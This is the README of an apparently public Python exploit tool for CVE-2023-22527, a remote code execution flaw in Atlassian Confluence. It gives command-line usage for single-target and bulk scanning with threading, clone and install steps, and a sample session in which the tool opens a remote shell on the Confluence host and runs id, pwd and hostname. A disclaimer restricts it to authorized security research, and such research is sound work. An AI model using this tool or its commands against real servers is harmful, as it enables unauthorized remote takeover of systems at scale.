This tool scans for the CVE-2023-22527 vulnerability in Atlassian Confluence, a critical RCE flaw allowing unauthorized remote code execution.
- Single URL Scan: Scan a specific target for the vulnerability.
- Bulk Scan: Process multiple URLs from a file for efficient vulnerability assessment.
- Concurrency Control: Utilize threading for faster bulk scanning.
- Output Logging: Save vulnerable URLs to a specified file.
- Single URL Scan:
python exploit.py -u <URL> - Bulk Scan:
python exploit.py -f <file_path> - Set Threads:
python exploit.py -t <number_of_threads> - Output File:
python exploit.py -o <output_file_path>
- Python 3.10+
- Dependencies:
requests,prompt_toolkit,rich,alive_progress
- Clone the repository:
git clone https://github.com/Chocapikk/CVE-2023-22527 - Install dependencies:
pip install -r requirements.txt
$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
/var/atlassian/application-data/confluence
$ hostname
ff7bfe2e7109This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.
For more detailed information about the CVE-2023-22527 vulnerability, refer to the Project Discovery Blog Post.